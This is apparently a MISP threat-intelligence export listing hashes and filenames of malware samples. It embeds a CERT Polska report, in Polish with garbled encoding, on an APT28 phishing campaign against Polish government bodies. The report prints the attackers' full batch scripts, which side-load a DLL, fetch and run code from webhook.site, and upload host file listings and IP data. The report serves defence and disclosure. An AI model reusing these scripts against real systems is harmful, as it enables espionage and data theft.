meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184692", "uuid": "9207ec19-9539-44c8-979f-bc9823719f8f", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184692", "to_ids": true, "type": "sha256", "uuid": "879cdcbd-c9a0-457f-b758-b79f92bc53e5", "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184693", "to_ids": true, "type": "filename", "uuid": "eefbc189-eb9b-4f5f-903b-d5a0cabc840f", "value": "wrkybdizscvb.css" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184790", "uuid": "452bf54b-7705-4904-ae1e-de8956d2dcbd", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184790", "to_ids": true, "type": "sha256", "uuid": "1a88bd12-7e5b-431f-945c-e8d0f8a24e02", "value": "5d2675572e092ba9aece8c8d0b9404b3adbd27db1312cd659ba561b86301fe73" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184790", "to_ids": true, "type": "filename", "uuid": "44dd48c8-615e-4d83-9ade-b7517f5f86cb", "value": "IMG-451458326.zip" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184855", "uuid": "f63530e6-b96e-4281-8e2e-a1d7e82f3f52", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184855", "to_ids": true, "type": "sha256", "uuid": "a12eeb03-76fc-444c-a427-e08b367f33e2", "value": "f348a0349fdec136c3ac9eaee9b8761da6bd33df82056e4dd792192731675b00" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184855", "to_ids": true, "type": "filename", "uuid": "60f41891-bf4a-4cb8-8e10-db82b8cbf63c", "value": "WindowsCodecs.dll" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184872", "uuid": "ddb9803a-4f2f-41fd-8600-0fd56884423a", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184873", "to_ids": true, "type": "sha256", "uuid": "898c1d7b-162f-4505-9387-cdd1b52cd66f", "value": "351f10d7df282afed4558d765aa5018af0711fa4f37fa7eb82716313f4848a2f" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184873", "to_ids": true, "type": "filename", "uuid": "7c2eafe3-7905-46ea-8ecb-19c5a1e22f25", "value": "illgvjrfyevoqxk.bat" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184920", "uuid": "292ce6ae-7b5f-4b37-a2ac-e23847020f54", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184920", "to_ids": true, "type": "sha256", "uuid": "5f13e5f9-5f86-4ef5-b1b5-9b26155bd0e5", "value": "85f10d3df079b4db3a83ae3c4620c58a8362df2be449f8ce830d087ab41c7a52" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184920", "to_ids": true, "type": "filename", "uuid": "b85aa640-43f7-4e69-aad6-04bc5c230236", "value": "IMG-451458326.jpg" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184939", "uuid": "ea8a8fa8-bc27-4dd6-8d11-2ed614c079b0", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184939", "to_ids": true, "type": "sha256", "uuid": "e6ac5754-399a-4e14-b43f-e24a793b4bd5", "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184939", "to_ids": true, "type": "filename", "uuid": "3ba2f450-8ef9-46f0-8983-973d68bdbc6e", "value": "mzmtfylpywlyurkcd.css" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715184977", "uuid": "771fc0bc-0722-4fde-8fa4-0119dc11f39d", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715184977", "to_ids": true, "type": "sha256", "uuid": "727b90e5-e2e2-4d38-bf37-e0eddb8e27cc", "value": "745cfce3e0242d0d5f6765b1f74608e9086d7793b45dbd1747f2d2778dec6587" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715184977", "to_ids": true, "type": "filename", "uuid": "7756c1bc-bf66-4c8a-b915-c56b2b38ad09", "value": "IMG-0601181.zip" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185012", "uuid": "f9ce542f-76a9-4733-96ad-e0337b8084da", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185012", "to_ids": true, "type": "sha256", "uuid": "a9b815ab-9f27-4032-ba07-85616143e3ca", "value": "598a8b918d0d2908a756475aee1e9ffaa57b110d8519014a075668b8b1182990" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185012", "to_ids": true, "type": "filename", "uuid": "65e07fb9-6dd1-4f67-ba34-93f90a30dcf4", "value": "WindowsCodecs.dll" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185057", "uuid": "d4434be0-d0bf-4494-a050-5163e1a00501", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185058", "to_ids": true, "type": "sha256", "uuid": "9ca56f4c-af24-4b9e-831e-5a8034c389ba", "value": "ef67f20ff9184cab46408b27eaf12a5941c9f130be49f1c6ac421b546dac2bac" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185058", "to_ids": true, "type": "filename", "uuid": "fe877bb9-7f6b-45fe-bf3b-b9056046a1ac", "value": "hzjtajjklr.bat" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185080", "uuid": "d469acd5-a763-4815-910f-e281b8703d42", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185080", "to_ids": true, "type": "sha256", "uuid": "5971460f-8104-4a22-ae16-7c404f78c525", "value": "96766dfbf6c661ee3e9f750696803824a04e58402c66f208835a7acebfab1cfc" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185080", "to_ids": true, "type": "filename", "uuid": "f5b7329e-ce28-4f39-af2b-1189dff6939a", "value": "IMG-0601181.jpg" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185105", "uuid": "b6711c34-69d4-45d7-8af0-1fa3a6cd3450", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185105", "to_ids": true, "type": "sha256", "uuid": "8ddc461c-03b3-4e60-b2c8-92c15fb96963", "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185105", "to_ids": true, "type": "filename", "uuid": "9778b55c-fbae-4498-9aed-8e93e764edaa", "value": "daukbpnawvkfcjcfzu.css" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185130", "uuid": "831cd969-7ac2-4c31-98b2-1df34dc9440c", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185131", "to_ids": true, "type": "sha256", "uuid": "577f6e0e-e270-4a7d-8ad9-047053dd2209", "value": "4f0f9a2076b0fd14124bed08f5fc939bada528e7a8163912a4ad1ec7687029a3" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185131", "to_ids": true, "type": "filename", "uuid": "a656d934-e95f-46e0-a5a6-bc18558b3e2b", "value": "IMG-89848928.zip" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185158", "uuid": "21f77deb-4015-4375-8f95-068e49df10f9", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185158", "to_ids": true, "type": "sha256", "uuid": "dd2ffa51-7411-4dbe-ae6b-2483a4475f47", "value": "ae4e94c5027998f4ce17343e50b935f448e099a89266f9564bd53a069da2ca9a" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185158", "to_ids": true, "type": "filename", "uuid": "9fb09332-ee63-42f9-b992-07eec707987c", "value": "WindowsCodecs.dll" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185183", "uuid": "667464be-8206-4e37-859f-adda50016e83", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185183", "to_ids": true, "type": "sha256", "uuid": "c6c2c200-5dd0-482c-9f80-438611575a59", "value": "d714fff643d53fdd56cf9dcb3bd265e1920c4b5f34a4668b584a0619703d8a3e" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185183", "to_ids": true, "type": "filename", "uuid": "187ad84e-e837-4965-b065-96f79c79352f", "value": "jxfgibtfxiewsdvmeg.bat" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185200", "uuid": "4c6e4ae6-993d-49c0-8ae7-74bbc51f9849", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185201", "to_ids": true, "type": "sha256", "uuid": "03f1f438-0779-4fb1-bc8b-752b50f3c5c0", "value": "b3e60909036c4110eb7e3d8c0b1db5be5c164fcc32056885e4f1afe561341afd" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185201", "to_ids": true, "type": "filename", "uuid": "c032a0c1-6142-4fd7-9c40-22be4404d931", "value": "IMG-89848928.jpg" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185219", "uuid": "a90b87b4-5afa-460c-b3b7-c2ae9d6b3334", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185219", "to_ids": true, "type": "sha256", "uuid": "9f6e2bd0-f515-4339-8942-9e27e9b2d12c", "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185219", "to_ids": true, "type": "filename", "uuid": "4683ae77-30d5-4869-8292-1afe20e779e2", "value": "cvywrkrhhfzza.css" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185240", "uuid": "cba32fe0-9818-41f5-b607-7eded83314f9", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185240", "to_ids": true, "type": "sha256", "uuid": "f8453d04-fcf9-49c6-94fa-c428b73ffd37", "value": "5883842c87ca6b59236257e15db983cc88d4948cf0d649455f8f393899673fcc" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185240", "to_ids": true, "type": "filename", "uuid": "12e73dc7-672e-4165-bfe2-c34492959a59", "value": "IMG-3907894910429.zip" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185259", "uuid": "b80aa835-216b-4c6a-8837-c3bb28da8718", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185259", "to_ids": true, "type": "sha256", "uuid": "0f4e90b3-a44c-4a21-ad35-214a5874af3f", "value": "0873a19d278a7a8e8cff2dc2e7edbfddc650d8ea961162a6eb3cb3ea14665983" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185259", "to_ids": true, "type": "filename", "uuid": "d8b61022-6f95-4223-9894-86cfd3700c0f", "value": "WindowsCodecs.dll" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185272", "uuid": "a93c737d-21a6-412b-a920-a68b8e57590d", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185272", "to_ids": true, "type": "sha256", "uuid": "a29aeefc-206d-47b3-941c-62838d42c37c", "value": "e826dc4f5c16a1802517881f32f26061a4cbc508c3f7944540a209217078aa11" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185272", "to_ids": true, "type": "filename", "uuid": "5afc82ee-1b17-421e-b295-601856518e4b", "value": "bmpxjphdzwommblflx.bat" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185288", "uuid": "c7737529-d089-43b9-9ef1-f5cfdb11bd64", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185288", "to_ids": true, "type": "sha256", "uuid": "e1978372-bf4c-4f9c-a50b-4763fc6fd29d", "value": "750948489ed5b92750dc254c47b02eb595c6ffcefded6f9d14c3482a96a6e793" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185288", "to_ids": true, "type": "filename", "uuid": "1259dfcd-f63b-4174-b2e0-6107ae85eb55", "value": "IMG-3907894910429.jpg" } ] }, { "comment": "", "deleted": false, "description": "File object describing a file with meta-information", "meta-category": "file", "name": "file", "template_uuid": "688c46fb-5edb-40a3-8273-1af7923e2215", "template_version": "24", "timestamp": "1715185303", "uuid": "29f885e5-676a-4eac-b824-694d79adada6", "Attribute": [ { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "sha256", "timestamp": "1715185303", "to_ids": true, "type": "sha256", "uuid": "00958635-58b1-4028-b8fb-8b89600777ae", "value": "939e664afa589272c4920b8463d80757afe5b1abd294cd9e59104c04da023364" }, { "category": "Payload delivery", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "filename", "timestamp": "1715185303", "to_ids": true, "type": "filename", "uuid": "ad21da8e-e504-4d8b-8977-94be4750f9a6", "value": "qseybqanfkus.css" } ] }, { "comment": "", "deleted": false, "description": "Report object to describe a report along with its metadata.", "meta-category": "misc", "name": "report", "template_uuid": "70a68471-df22-4e3f-aa1a-5a3be19f82df", "template_version": "8", "timestamp": "1715185434", "uuid": "ee17c073-f9a9-4be9-a7fc-ee2571e44da6", "Attribute": [ { "category": "External analysis", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "link", "timestamp": "1715185434", "to_ids": false, "type": "link", "uuid": "fee1f798-295d-44bd-b84c-49ff4a2f4308", "value": "https://cert.pl/posts/2024/05/apt28-kampania/" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": false, "object_relation": "title", "timestamp": "1715185434", "to_ids": false, "type": "text", "uuid": "710bf56b-3237-4259-9697-e0bc672d4211", "value": "Kampania APT28 skierowana przeciwko polskim instytucjom rz\u0105dowym" }, { "category": "Other", "comment": "", "deleted": false, "disable_correlation": true, "object_relation": "type", "timestamp": "1715185434", "to_ids": false, "type": "text", "uuid": "9d6c23db-82c8-423d-887c-59ea34960f4f", "value": "Blog" } ] } ], "EventReport": [ { "name": "Report from - https://cert.pl/posts/2024/05/apt28-kampania/ (1715185341)", "content": "# Kampania APT28 skierowana przeciwko polskim instytucjom rz\u00c4 dowym 08 maja 2024 | CERT Polska | #ostrze\u00c5\u00bcenie, #apt, #apt28 Zespo\u00c5\u0082y CERT Polska (CSIRT NASK) oraz CSIRT MON zaobserwowa\u00c5\u0082y w tym tygodniu szeroko zakrojon\u00c4 kampani\u00c4\u0099 szkodliwego oprogramowania wymierzon\u00c4 w polskie instytucje rz\u00c4 dowe. Na podstawie wska\u00c5\u00banik\u00c3\u00b3w technicznych i podobie\u00c5\u0084stwa do atak\u00c3\u00b3w opisywanych w przesz\u00c5\u0082o\u00c5\u009bci (m.in. na podmioty ukrai\u00c5\u0084skie), mo\u00c5\u00bcna powi\u00c4 za\u00c4\u0087 kampani\u00c4\u0099 ze zbiorem aktywno\u00c5\u009bci APT28, kt\u00c3\u00b3ry jest kojarzony z G\u00c5\u0082\u00c3\u00b3wnym Zarz\u00c4 dem Wywiadowczym Sztabu Generalnego Si\u00c5\u0082 Zbrojnych Federacji Rosyjskiej (GRU).\r\n\r\n ## Analiza techniczna\r\n\r\n W kampanii zosta\u00c5\u0082y rozes\u00c5\u0082ane wiadomo\u00c5\u009bci e-mail o tre\u00c5\u009bci, kt\u00c3\u00b3ra ma wywo\u00c5\u0082a\u00c4\u0087 zainteresowanie u odbiorcy i nak\u00c5\u0082oni\u00c4\u0087 go do klikni\u00c4\u0099cia w link. Przyk\u00c5\u0082ad u\u00c5\u00bcytej wiadomo\u00c5\u009bci przedstawiamy poni\u00c5\u00bcej: \r\n\r\n Link kieruje do adresu w domenie run.mocky.io. Jest to darmowy serwis u\u00c5\u00bcywany przez programist\u00c3\u00b3w, do tworzenia i testowania interfejs\u00c3\u00b3w API. W tym przypadku zosta\u00c5\u0082 on wykorzystany jedynie do przekierowania na kolejny serwis \u00e2\u0080\u0093 webhook.site, pozwalaj\u00c4 cy na logowanie wszelkich zapyta\u00c5\u0084 do wygenerowanego adresu oraz konfigurowanie odpowiedzi na nie. Serwis ten r\u00c3\u00b3wnie\u00c5\u00bc jest popularny w\u00c5\u009br\u00c3\u00b3d os\u00c3\u00b3b zwi\u00c4 zanych z IT. Wykorzystanie darmowych, powszechnie u\u00c5\u00bcywanych us\u00c5\u0082ug, zamiast w\u00c5\u0082asnych domen, pozwala na znaczne ograniczenie wykrycia link\u00c3\u00b3w jako z\u00c5\u0082o\u00c5\u009bliwe, a jednocze\u00c5\u009bnie obni\u00c5\u00bca koszt prowadzonej operacji. Jest to trend, kt\u00c3\u00b3ry obserwujemy u wielu grup APT.\r\n\r\n Z serwisu webhook.site zostaje ostatecznie pobrane archiwum ZIP, kt\u00c3\u00b3rego nazwa sugeruje zawarto\u00c5\u009b\u00c4\u0087 w postaci zdj\u00c4\u0099\u00c4\u0087. Zaczyna si\u00c4\u0099 ona od IMG-, a ko\u00c5\u0084czy losow\u00c4 liczb\u00c4 - np. IMG-238279780.zip. Po klikni\u00c4\u0099ciu w archiwum, przy domy\u00c5\u009blnych ustawieniach systemu Windows (ukryte rozszerzenia i brak pokazywania ukrytych plik\u00c3\u00b3w), ofierze ukazuje si\u00c4\u0099 nast\u00c4\u0099puj\u00c4 cy widok:\r\n\r\n Tak naprawd\u00c4\u0099 archiwum zawiera trzy pliki: \r\n\r\n \r\n * kalkulator windowsowy ze zmienion\u00c4 nazw\u00c4 , np. IMG-238279780.jpg.exe, kt\u00c3\u00b3ry udaje zdj\u00c4\u0099cie i zach\u00c4\u0099ca ofiar\u00c4\u0099 do klikni\u00c4\u0099cia,\r\n * skrypt .bat (plik ukryty),\r\n * fa\u00c5\u0082szyw\u00c4 bibliotek\u00c4\u0099 WindowsCodecs.dll (plik ukryty).\r\n \r\n Je\u00c5\u009bli ofiara uruchomi plik IMG-238279780.jpg.exe (b\u00c4\u0099d\u00c4 cy nieszkodliwym kalkulatorem), podczas startu spr\u00c3\u00b3buje on za\u00c5\u0082adowa\u00c4\u0087 bibliotek\u00c4\u0099 WindowsCodecs.dll, kt\u00c3\u00b3ra zosta\u00c5\u0082a podstawiona przez atakuj\u00c4 cych. Jest to technika znana jako *DLL Side-Loading*. Jedyn\u00c4 rol\u00c4 biblioteki DLL jest uruchomenie do\u00c5\u0082\u00c4 czonego skryptu BAT:\r\n\r\n @echo off if not DEFINED IS\\_MINIMIZED ( set IS\\_MINIMIZED=1 start \"\" /min \"%~dpnx0\" %* exit ) start msedge data:text/html;base64,PHRpdGxlPklNRy02MzQ5MjMzNjk2OC5qcGc8L3RpdGxlPjxpZnJhbWUgc3JjPSJodHRwczovL3dlYmhvb2suc2l0ZS9hYWU0MmFlNC1mM2VhLTRkYmYtYTMzZi0zZmY1YjFiYWVjOWIiIHN0eWxlPSJwb3NpdGlvbjpmaXhlZDsgdG9wOjA7IGxlZnQ6MDsgYm90dG9tOjA7IHJpZ2h0OjA7IHdpZHRoOjEwMCU7IGhlaWdodDoxMDAlOyBib3JkZXI6bm9uZTsgbWFyZ2luOjA7IHBhZGRpbmc6MDsgb3ZlcmZsb3c6aGlkZGVuOyB6LWluZGV4Ojk5OTk5OTsiPjwvaWZyYW1lPg== timeout 15 > nul move %userprofile%\\downloads\\IMG-63492336968.jpg %programdata%\\IMG-63492336968.cmd > nul type nul > %userprofile%\\downloads\\IMG-63492336968.jpg call %programdata%\\IMG-63492336968.cmd del /q /f /a %0 exit Skrypt BAT otwiera przegl\u00c4 dark\u00c4\u0099 Microsoft Edge, w kt\u00c3\u00b3rej \u00c5\u0082adowana jest zawarto\u00c5\u009b\u00c4\u0087 strony zakodowana w base64, aby pobra\u00c4\u0087 kolejny skrypt batchowy (r\u00c3\u00b3wnie\u00c5\u00bc korzystaj\u00c4 c z serwisu webhook.site). Jednocze\u00c5\u009bnie w przegl\u00c4 darce wy\u00c5\u009bwietalne s\u00c4 zdj\u00c4\u0099cia rzeczywistej kobiety w stroju k\u00c4 pielowym wraz z odno\u00c5\u009bnikami do jej prawdziwych kont na platformach social media. Ma to na celu uwiarygodni\u00c4\u0087 narracj\u00c4\u0099 atakuj\u00c4 cych oraz u\u00c5\u009bpi\u00c4\u0087 czujno\u00c5\u009b\u00c4\u0087 odbiorcy. Skrypt zapisuje pobrany plik z rozszerzeniem .jpg na dysku, zmienia rozszerzenie z .jpg na .cmd oraz ostatecznie go wykonuje.\r\n\r\n @echo off & ( echo On Error Resume Next echo CreateObject(\"WScript.shell\").Run \"^\"\"%%programdata%%\\\\dee016bf-21a2-45dd-86b4-6099747794c4.bat^\"^^\"\", 0, False echo Set oFso = CreateObject(\"Scripting.FileSystemObject\") : oFso.DeleteFile Wscript.ScriptFullName, True ) > \"%programdata%\\dee016bf-21a2-45dd-86b4-6099747794c4.vbs\" & echo del %%0 ^& for /l %%%%n in () do ( chcp 65001 ^& timeout 300 ^& taskkill /im msedge.exe /f ^& timeout 5 ^& del /q /f \"%%userprofile%%\\Downloads\\*.css\" ^& start \"\" msedge --headless=new --disable-gpu data:text/html;base64,PHNjcmlwdD53aW5kb3cubG9jYXRpb24ucmVwbGFjZSgiaHR0cHM6Ly93ZWJob29rLnNpdGUvZGVlMDE2YmYtMjFhMi00NWRkLTg2YjQtNjA5OTc0Nzc5NGM0Iik7PC9zY3JpcHQ+ ^& timeout 30 ^& taskkill /im msedge.exe /f ^& move /y \"%%userprofile%%\\Downloads\\*.css\" \"%%programdata%%\\dee016bf-21a2-45dd-86b4-6099747794c4.cmd\" ^& call \"%%programdata%%\\dee016bf-21a2-45dd-86b4-6099747794c4.cmd\" ^& del /q /f \"%%programdata%%\\dee016bf-21a2-45dd-86b4-6099747794c4.cmd\" ) > \"%programdata%\\dee016bf-21a2-45dd-86b4-6099747794c4.bat\" & ( echo ^^^^var xhr = new XMLHttpRequest^(^);var text = String.raw^`) ) > \"%programdata%\\uaxhexd.tab\" & ( echo ^`;xhr.open^(^'PUT^', ^'https://webhook.site/dee016bf-21a2-45dd-86b4-6099747794c4^'^);xhr.setRequestHeader^(^'Content-Type^', ^'text/html^'^);xhr.send^(text^);^^^ ) > \"%programdata%\\ohqddqtqc.tsv\" & start \"\" \"%programdata%\\dee016bf-21a2-45dd-86b4-6099747794c4.vbs\" & del %0 Ten skrypt stanowi g\u00c5\u0082\u00c3\u00b3wn\u00c4 p\u00c4\u0099tl\u00c4\u0099 programu \u00e2\u0080\u0093 w p\u00c4\u0099tli for /l %n in () najpierw czeka 5 minut, a nast\u00c4\u0099pnie analogicznie jak poprzednio, za pomoc\u00c4 przegladarki Microsoft Edge i odwo\u00c5\u0082ania do webhook.site pobiera kolejny skrypt i go wykonuje. Tym razem pobierany jest plik z rozszerzeniem .css, po czym nast\u00c4\u0099puje zmiana jego rozszerzenia na .cmd i uruchomienie.\r\n\r\n Otrzymany przez nas ostatecznie skrypt zbiera wy\u00c5\u0082\u00c4 cznie informacje o komputerze (adres IP oraz lista plik\u00c3\u00b3w w wybranych folderach), na kt\u00c3\u00b3rym si\u00c4\u0099 uruchomi\u00c5\u0082y, a nast\u00c4\u0099pnie przesy\u00c5\u0082aj\u00c4 je do serwera C2, ale prawdopodobnie komputery ofiar wybrane przez atakuj\u00c4 cych otrzymuj\u00c4 inny zestaw skrypt\u00c3\u00b3w ko\u00c5\u0084cowych.\r\n\r\n~~~\r\n @echo off chcp 65001 taskkill /im msedge.exe /f (dir \"%userprofile%\\..\" & dir \"%userprofile%\\Desktop\" & dir \"%userprofile%\\Downloads\" & dir \"%userprofile%\\Documents\" & dir \"%ProgramFiles%\" & dir \"%ProgramFiles(x86)%\" & curl -k https://ipinfo.io) > \"%programdata%\\bwjxyeysed.diff\" copy \"%programdata%\\*.tab\" + \"%programdata%\\*.diff\" + \"%programdata%\\*.tsv\" \"%programdata%\\nydgflyhuv.html\" (echo %programdata%) > \"%programdata%\\gjvrexfiac\" set /p gjvrexfiac=<\"%programdata%\\gjvrexfiac\" timeout 5 start \"\" msedge --headless=new --disable-gpu \"file:///%gjvrexfiac%/nydgflyhuv.html\" timeout 30 taskkill /im msedge.exe /f del /q /f \"%userprofile%\\Downloads\\*.css\" del /q /f \"%programdata%\\gjvrexfiac\" del /q /f \"%programdata%\\*.diff\" del /q /f \"%programdata%\\nydgflyhuv.html\" Ca\u00c5\u0082y przebieg ataku zosta\u00c5\u0082 pokazany na poni\u00c5\u00bcszym diagramie. Jego przebieg jest to\u00c5\u00bcsamy z opisywanym w przesz\u00c5\u0082o\u00c5\u009bci publicznie z\u00c5\u0082o\u00c5\u009bliwym oprogramowaniem HEADLACE.\r\n~~~\r\n\r\n## Rekomendacje\r\n\r\n Podstawowym celem tej publikacji jest zak\u00c5\u0082\u00c3\u00b3cenie wrogich aktywno\u00c5\u009bci i umo\u00c5\u00bcliwienie wykrycia oraz analizy opisywanych dzia\u00c5\u0082a\u00c5\u0084. Zesp\u00c3\u00b3\u00c5\u0082 CERT Polska rekomenduje, aby administratorzy sieci sprawdzili, czy pracownicy organizacji nie byli obiektem ataku.\r\n\r\n \r\n * Zalecamy weryfikacj\u00c4\u0099 odnotowanych w ostatnim czasie po\u00c5\u0082\u00c4 cze\u00c5\u0084 do domen webhook.site oraz run.mocky.io oraz ich obecno\u00c5\u009bci w 